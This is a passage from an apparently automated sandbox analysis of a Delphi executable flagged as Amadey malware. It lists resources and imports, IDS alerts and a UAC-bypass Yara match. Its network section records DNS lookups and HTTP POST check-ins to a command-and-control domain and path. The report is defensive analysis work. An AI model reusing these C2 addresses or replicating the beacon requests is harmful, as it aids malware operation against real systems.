                                                                                                      RT_RCDATA0xb41a500x553zlib compressed dataEnglishAustralia1.008070432868672
                                                                                                      RT_RCDATA0xb41fa40x13140zlib compressed dataEnglishAustralia1.0001535626535627
                                                                                                      RT_RCDATA0xb550e40x530zlib compressed dataEnglishAustralia1.0082831325301205
                                                                                                      RT_RCDATA0xb556140x142cbzlib compressed dataEnglishAustralia0.9997579718037152
                                                                                                      RT_RCDATA0xb698e00x13ce6zlib compressed dataEnglishAustralia0.9998397554421518
                                                                                                      RT_RCDATA0xb7d5c80x537zlib compressed dataEnglishAustralia1.0082397003745318
                                                                                                      RT_RCDATA0xb7db000xe4bczlib compressed dataEnglishAustralia0.9999316893230412
                                                                                                      RT_RCDATA0xb8bfbc0x4bdzlib compressed dataEnglishAustralia1.0090684253915911
                                                                                                      RT_RCDATA0xb8c47c0xa18zlib compressed dataEnglishAustralia1.0042569659442724
                                                                                                      RT_RCDATA0xb8ce940x9f8zlib compressed dataEnglishAustralia1.0043103448275863
                                                                                                      RT_RCDATA0xb8d88c0x11690zlib compressed dataEnglishAustralia1.0004347094458155
                                                                                                      RT_RCDATA0xb9ef1c0x917zlib compressed dataEnglishAustralia1.00472711645896
                                                                                                      RT_RCDATA0xb9f8340x1258fzlib compressed dataEnglishAustralia1.0004125028276403
                                                                                                      RT_RCDATA0xbb1dc40x968zlib compressed dataEnglishAustralia1.0045681063122924
                                                                                                      RT_RCDATA0xbb272c0x11b01zlib compressed dataEnglishAustralia1.000427887203412
                                                                                                      RT_RCDATA0xbc42300x94dzlib compressed dataEnglishAustralia1.004619907601848
                                                                                                      RT_RCDATA0xbc4b800x116c9zlib compressed dataEnglishAustralia1.0004343622581233
                                                                                                      RT_RCDATA0xbd624c0x919zlib compressed dataEnglishAustralia1.0047230571060541
                                                                                                      RT_RCDATA0xbd6b680x12600zlib compressed dataEnglishAustralia1.0004118835034013
                                                                                                      RT_RCDATA0xbe91680x96bzlib compressed dataEnglishAustralia1.0045624222314393
                                                                                                      RT_RCDATA0xbe9ad40x11b82zlib compressed dataEnglishAustralia1.0004271266775056
                                                                                                      RT_RCDATA0xbfb6580x951zlib compressed dataEnglishAustralia1.0046121593291404
                                                                                                      RT_RCDATA0xbfbfac0xa45zlib compressed dataEnglishAustralia1.00418410041841
                                                                                                      RT_RCDATA0xbfc9f40xa20zlib compressed dataEnglishAustralia1.0042438271604939
                                                                                                      RT_RCDATA0xbfd4140xa50zlib compressed dataEnglishAustralia1.0041666666666667
                                                                                                      RT_RCDATA0xbfde640x1254dzlib compressed dataEnglishAustralia1.0004128654191915
                                                                                                      RT_RCDATA0xc103b40x975zlib compressed dataEnglishAustralia1.0045435770342834
                                                                                                      RT_RCDATA0xc10d2c0x125cczlib compressed dataEnglishAustralia1.0004121682710205
                                                                                                      RT_RCDATA0xc232f80x978zlib compressed dataEnglishAustralia1.0045379537953796
                                                                                                      RT_RCDATA0xc23c700xe84dzlib compressed dataEnglishAustralia0.9976290167986682
                                                                                                      RT_RCDATA0xc324c00x52dzlib compressed dataEnglishAustralia1.008301886792453
                                                                                                      RT_RCDATA0xc329f00xc03czlib compressed dataEnglishAustralia1.0004267251889782
                                                                                                      RT_RCDATA0xc3ea2c0x520zlib compressed dataEnglishAustralia1.0083841463414633
                                                                                                      RT_RCDATA0xc3ef4c0xcb60zlib compressed dataEnglishAustralia1.0000960356484327
                                                                                                      RT_RCDATA0xc4baac0x528zlib compressed dataEnglishAustralia1.0083333333333333
                                                                                                      RT_RCDATA0xc4bfd40xc70dzlib compressed dataEnglishAustralia1.0005102341189631
                                                                                                      RT_RCDATA0xc586e40x528zlib compressed dataEnglishAustralia1.0083333333333333
                                                                                                      RT_RCDATA0xc58c0c0x563zlib compressed dataEnglishAustralia1.0079767947788252
                                                                                                      RT_RCDATA0xc591700x573zlib compressed dataEnglishAustralia1.0078853046594982
                                                                                                      RT_RCDATA0xc596e40x829ezlib compressed dataEnglishAustralia1.0006280279921047
                                                                                                      RT_RCDATA0xc619840x1c46czlib compressed dataEnglishAustralia0.924391296839924
                                                                                                      RT_RCDATA0xc7ddf00x8011zlib compressed dataEnglishAustralia0.9996949824614916
                                                                                                      RT_RCDATA0xc85e040x85cezlib compressed dataEnglishAustralia1.0006130670870554
                                                                                                      RT_RCDATA0xc8e3d40xbeccolor profile 2.0, RGB/XYZ-mntr device, 3052 bytes, 27-3-2009 21:37:45, 0x1 vendor attribute, relative colorimetric, 0xc95bd637e95d8a3b MD5 "sRGB IEC61966-2-1 no black scaling"EnglishUnited States0.8502621231979031
                                                                                                      RT_RCDATA0xc8efc00x6cdbzlib compressed dataEnglishSouthern Africa1.0005741558115333
                                                                                                      RT_RCDATA0xc95c9c0x64b4zlib compressed dataEnglishSouthern Africa0.9968968192397207
                                                                                                      RT_GROUP_CURSOR0xc9c1500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                      RT_GROUP_CURSOR0xc9c1640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                      RT_GROUP_CURSOR0xc9c1780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                      RT_GROUP_CURSOR0xc9c18c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                      RT_GROUP_CURSOR0xc9c1a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                      RT_GROUP_CURSOR0xc9c1b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                      RT_GROUP_CURSOR0xc9c1c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                      RT_GROUP_CURSOR0xc9c1dc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                      RT_GROUP_ICON0xc9c1f00x3edataEnglishUnited States0.8225806451612904
                                                                                                      RT_VERSION0xc9c2300x37cdataEnglishUnited States0.46524663677130046
                                                                                                      RT_MANIFEST0xc9c5ac0x6dcXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishGreat Britain0.3331435079726651

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetCloseEnum, WNetOpenEnumW
                                                                                                      winmm.dlltimeGetTime
                                                                                                      shlwapi.dllPathMatchSpecW, StrRetToStrW
                                                                                                      FontSub.dllCreateFontPackage
                                                                                                      wininet.dllInternetCloseHandle, InternetReadFile, InternetOpenW, InternetOpenUrlW, HttpQueryInfoW
                                                                                                      winspool.drvDocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
                                                                                                      comdlg32.dllChooseFontW, GetSaveFileNameW, GetOpenFileNameW
                                                                                                      comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, ImageList_GetDragImage, FlatSB_SetScrollProp, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
                                                                                                      shell32.dllSHBrowseForFolderW, SHBindToParent, DragQueryFileW, SHGetSpecialFolderLocation, ILCombine, Shell_NotifyIconW, SHCreateShellItem, SHGetDataFromIDListW, SHGetPathFromIDListW, ShellExecuteExW, ILFindLastID, ILGetNext, SHChangeNotifyDeregister, ILCreateFromPathW, ILFindChild, SHGetFileInfoW, SHGetDesktopFolder, ILRemoveLastID, ILFree, ILClone, IsUserAnAdmin, SHChangeNotification_Unlock, ShellExecuteW
                                                                                                      user32.dllCopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoExW, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, SendDlgItemMessageW, IntersectRect, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, PtInRect, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, GetComboBoxInfo, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, wvsprintfA, GetSysColorBrush, GetWindowDC, DrawTextExW, CharLowerBuffA, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, IsRectEmpty, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, GetMenuItemRect, CreateIconIndirect, CreateWindowExW, ChildWindowFromPoint, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, MessageBoxA, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, InflateRect, IsCharAlphaNumericA, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, TrackMouseEvent, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, GetDlgItem, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, CloseClipboard, DestroyCursor, PostQuitMessage, ShowScrollBar, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
                                                                                                      version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                      oleaut32.dllGetErrorInfo, SysFreeString, VariantClear, VariantInit, SysReAllocStringLen, SafeArrayCreate, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, VariantChangeType, VariantCopyInd
                                                                                                      advapi32.dllRegFlushKey, RegQueryValueExW, RegCloseKey, RegOpenKeyExW
                                                                                                      netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                      msvcrt.dllmemcpy, memset
                                                                                                      kernel32.dllSetFileAttributesW, GetFileType, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetLongPathNameW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, FileTimeToDosDateTime, ReadFile, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetFileAttributesExW, ExpandEnvironmentStringsW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetTempFileNameW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, GetModuleFileNameA, GlobalHandle, lstrlenW, CompareStringA, SetEndOfFile, QueryPerformanceCounter, lstrcpyW, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, EnumResourceNamesW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                      ole32.dllRevokeDragDrop, CreateBindCtx, CoCreateGuid, CoCreateInstance, CoUninitialize, ReleaseStgMedium, RegisterDragDrop, IsEqualGUID, OleInitialize, CLSIDFromProgID, OleUninitialize, CoInitializeEx, CoInitialize, CoTaskMemFree, CoTaskMemAlloc
                                                                                                      gdi32.dllEnumEnhMetaFile, Pie, SetPaletteEntries, SetBkMode, CreateCompatibleBitmap, BeginPath, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, CloseFigure, SetICMMode, StrokeAndFillPath, ResizePalette, SetAbortProc, SetTextColor, GetTextColor, StretchBlt, GetGlyphIndicesW, RoundRect, SelectClipRgn, ExtEscape, RestoreDC, SetRectRgn, GetFontLanguageInfo, FillPath, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, SetPixelV, CreatePalette, GetCharWidth32W, CreateDCW, CreateICW, PolyBezierTo, GetStockObject, CreateSolidBrush, GetBkMode, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, GetSystemPaletteEntries, GetEnhMetaFileBits, CreatePenIndirect, GetEnhMetaFilePaletteEntries, SetMapMode, CreateFontIndirectW, PolyBezier, EndDoc, GetObjectW, GetFontData, GetCurrentObject, GetCharWidthW, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, GetKerningPairs, EnumFontFamiliesExA, CreateEnhMetaFileW, Arc, SelectPalette, SetGraphicsMode, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, EndPath, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, GetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetGlyphIndicesA, GetDIBColorTable, GetGlyphOutlineW, CreateBrushIndirect, PatBlt, StrokePath, SetEnhMetaFileBits, Rectangle, DeleteDC, SaveDC, BitBlt, SetWorldTransform, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, CombineTransform, CreateBitmap, CombineRgn, SetWinMetaFileBits, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, SetStretchBltMode, GetDIBits, ExtCreateRegion, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, CreateRoundRectRgn, GetTextExtentPointW, GetOutlineTextMetricsA, ExtTextOutW, SetBrushOrgEx, GetPixel, GetTextFaceW, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      TMethodImplementationIntercept30x4bcfb0
                                                                                                      __dbk_fcall_wrapper20x410c54
                                                                                                      dbkFCallWrapperAddr10x9ff63c

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States
                                                                                                      EnglishAustralia
                                                                                                      EnglishSouthern Africa
                                                                                                      EnglishGreat Britain

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-25T22:43:37.141787+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449838188.114.97.380TCP
                                                                                                      2024-10-25T22:43:38.925555+02002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449838188.114.97.380TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 25, 2024 22:43:36.020263910 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:43:36.025679111 CEST8049838188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 22:43:36.025753975 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:43:36.025903940 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:43:36.031367064 CEST8049838188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 22:43:37.140635014 CEST8049838188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 22:43:37.141787052 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:43:37.141901016 CEST8049838188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 22:43:37.141974926 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:43:38.645340919 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:43:38.650702000 CEST8049838188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 22:43:38.925343990 CEST8049838188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 22:43:38.925554991 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:45:25.971975088 CEST4983880192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 22:45:25.979310036 CEST8049838188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 22:45:25.979415894 CEST4983880192.168.2.4188.114.97.3

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 25, 2024 22:43:36.002202034 CEST6503053192.168.2.41.1.1.1
                                                                                                      Oct 25, 2024 22:43:36.002669096 CEST5814353192.168.2.41.1.1.1
                                                                                                      Oct 25, 2024 22:43:36.005321980 CEST5315853192.168.2.41.1.1.1
                                                                                                      Oct 25, 2024 22:43:36.011610985 CEST53650301.1.1.1192.168.2.4
                                                                                                      Oct 25, 2024 22:43:36.013505936 CEST53531581.1.1.1192.168.2.4
                                                                                                      Oct 25, 2024 22:43:36.014693022 CEST53581431.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 25, 2024 22:43:36.002202034 CEST192.168.2.41.1.1.10xb8c6Standard query (0)artvisions-autoinsider3.comA (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 22:43:36.002669096 CEST192.168.2.41.1.1.10x8f97Standard query (0)artvisions-autoinsider.comA (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 22:43:36.005321980 CEST192.168.2.41.1.1.10x42a6Standard query (0)artvisions-autoinsider2.comA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 25, 2024 22:43:36.011610985 CEST1.1.1.1192.168.2.40xb8c6Name error (3)artvisions-autoinsider3.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 22:43:36.013505936 CEST1.1.1.1192.168.2.40x42a6Name error (3)artvisions-autoinsider2.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 22:43:36.014693022 CEST1.1.1.1192.168.2.40x8f97No error (0)artvisions-autoinsider.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 22:43:36.014693022 CEST1.1.1.1192.168.2.40x8f97No error (0)artvisions-autoinsider.com188.114.96.3A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • artvisions-autoinsider.com

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449838188.114.97.3804348C:\Windows\SysWOW64\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 22:43:36.025903940 CEST171OUTPOST /8bkjdSdfjCe/index.php HTTP/1.1
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Host: artvisions-autoinsider.com
                                                                                                      Content-Length: 4
                                                                                                      Cache-Control: no-cache
                                                                                                      Data Raw: 73 74 3d 73
                                                                                                      Data Ascii: st=s
                                                                                                      Oct 25, 2024 22:43:37.140635014 CEST774INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 20:43:36 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dr0czzqNre%2FuWKD3PcvNF2W2oPvKFD8UvsaHZ1BdV7SkgApICq5o931UI9aA8pS8ACBM64z7PYPuhcwmikzlSeIt2Gvvg2UJPpV8vZnQ9HfEKzgLFlyNUbFvnJWmiPYCXnPQmxITRKduPEvrVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d850a318a9d2d33-DFW
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1385&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=171&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 1 0
                                                                                                      Oct 25, 2024 22:43:37.141901016 CEST774INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 20:43:36 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dr0czzqNre%2FuWKD3PcvNF2W2oPvKFD8UvsaHZ1BdV7SkgApICq5o931UI9aA8pS8ACBM64z7PYPuhcwmikzlSeIt2Gvvg2UJPpV8vZnQ9HfEKzgLFlyNUbFvnJWmiPYCXnPQmxITRKduPEvrVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d850a318a9d2d33-DFW
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1385&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=171&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 1 0
                                                                                                      Oct 25, 2024 22:43:38.645340919 CEST323OUTPOST /8bkjdSdfjCe/index.php HTTP/1.1
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Host: artvisions-autoinsider.com
                                                                                                      Content-Length: 154
                                                                                                      Cache-Control: no-cache
                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 39 43 45 34 34 41 44 31 33 43 31 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 46 44 44 43 37 31 30 35 39 37 32 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 38
                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A76659CE44AD13C1D58C48CF8B295278F7EBCB075A9634FFDDC7105972FEA7596F64579EC8B2482ABAE6C811856F005AE078E55178
                                                                                                      Oct 25, 2024 22:43:38.925343990 CEST796INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 20:43:38 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUNYaYlWfEY0T4RmgnbK8a63463p65ez9G7Sj%2B6D3s8ZoxRrcUMZkbKnekk7oT%2FFR8sGEudyMe7oM521xjpwJIEuLKpA%2BrLET6RnDqTnmT0XzihLHAtXUYU8Pz03uWcrXpDFaYS0swwcE%2F%2B7YA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d850a3ee8552d33-DFW
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1388&sent=4&recv=6&lost=0&retrans=0&sent_bytes=774&recv_bytes=494&delivery_rate=1991746&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:16:42:24
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5 hash:FF827141856089465CEC7AFDC9E65F9D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1730888199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.2156540910.000000000394F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:16:42:26
                                                                                                      Start date:25/10/2024
